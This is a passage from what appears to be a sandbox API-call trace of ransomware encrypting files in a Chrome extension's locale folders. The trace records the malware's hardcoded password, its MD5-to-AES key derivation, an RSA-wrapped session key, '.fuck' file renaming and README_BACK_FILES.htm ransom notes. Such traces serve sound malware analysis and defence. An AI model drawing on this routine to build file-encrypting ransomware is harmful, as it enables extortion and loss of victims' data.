lpWideCharStr=0x0) returned 155 [0252.340] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0252.341] GetFileType (hFile=0x5d60) returned 0x1 [0252.341] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0252.342] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0252.343] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0252.343] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.343] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.343] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0252.343] GetLastError () returned 0x0 [0252.343] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json")) returned 0x20 [0252.344] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json", dwFileAttributes=0x80) returned 1 [0252.345] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0252.345] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0252.347] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0252.348] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0252.350] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0252.350] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0252.350] CryptHashData (hHash=0x29846a0, pbData=0x28cb3c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.350] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2983fe0) returned 1 [0252.351] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.351] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0252.351] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298c570) returned 1 [0252.351] CryptImportPublicKeyInfo (in: hCryptProv=0x298c570, dwCertEncodingType=0x1, pInfo=0x2994310*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2994340*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2994348*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984a60) returned 1 [0252.351] CryptEncrypt (in: hKey=0x2984a60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0252.351] CryptEncrypt (in: hKey=0x2984a60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298b938*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298b938*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0252.351] WriteFile (in: hFile=0x5d5c, lpBuffer=0x298b938*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298b938*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0252.353] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0252.354] CryptEncrypt (in: hKey=0x2983fe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0252.354] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0252.354] CloseHandle (hObject=0x5d64) returned 1 [0252.355] CloseHandle (hObject=0x5d5c) returned 1 [0252.355] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json"), bFailIfExists=0) returned 1 [0252.358] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json", dwFileAttributes=0x0) returned 1 [0252.359] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json.gsg")) returned 1 [0252.360] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json.fuck")) returned 1 [0252.361] CryptDestroyHash (hHash=0x29846a0) returned 1 [0252.361] CryptDestroyKey (hKey=0x2983fe0) returned 1 [0252.361] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0252.361] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0252.361] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0252.361] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\readme_back_files.htm")) returned 0xffffffff [0252.362] AreFileApisANSI () returned 1 [0252.362] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e39a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0252.362] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0252.362] GetFileType (hFile=0x5d60) returned 0x1 [0252.363] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0252.364] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0252.364] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0252.364] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.364] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.364] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0252.364] GetLastError () returned 0x0 [0252.364] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json")) returned 0x20 [0252.364] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json", dwFileAttributes=0x80) returned 1 [0252.365] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0252.366] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0252.367] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0252.368] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0252.370] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0252.370] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0252.370] CryptHashData (hHash=0x29846a0, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.370] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2983fe0) returned 1 [0252.370] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.370] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0252.370] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298b9c0) returned 1 [0252.371] CryptImportPublicKeyInfo (in: hCryptProv=0x298b9c0, dwCertEncodingType=0x1, pInfo=0x2994580*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29945b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29945b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984ee0) returned 1 [0252.371] CryptEncrypt (in: hKey=0x2984ee0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0252.371] CryptEncrypt (in: hKey=0x2984ee0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298bd78*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298bd78*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0252.371] WriteFile (in: hFile=0x5d64, lpBuffer=0x298bd78*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298bd78*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0252.372] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0252.373] CryptEncrypt (in: hKey=0x2983fe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0252.373] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0252.373] CloseHandle (hObject=0x5d5c) returned 1 [0252.373] CloseHandle (hObject=0x5d64) returned 1 [0252.373] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json"), bFailIfExists=0) returned 1 [0252.376] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json", dwFileAttributes=0x0) returned 1 [0252.377] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json.gsg")) returned 1 [0252.378] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json.fuck")) returned 1 [0252.379] CryptDestroyHash (hHash=0x29846a0) returned 1 [0252.379] CryptDestroyKey (hKey=0x2983fe0) returned 1 [0252.379] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0252.379] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0252.379] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0252.379] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\readme_back_files.htm")) returned 0xffffffff [0252.379] AreFileApisANSI () returned 1 [0252.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3af0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0252.379] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0252.380] GetFileType (hFile=0x5d60) returned 0x1 [0252.380] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0252.381] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0252.381] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0252.381] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.381] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.381] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0252.381] GetLastError () returned 0x0 [0252.381] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json")) returned 0x20 [0252.382] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json", dwFileAttributes=0x80) returned 1 [0252.383] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0252.383] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 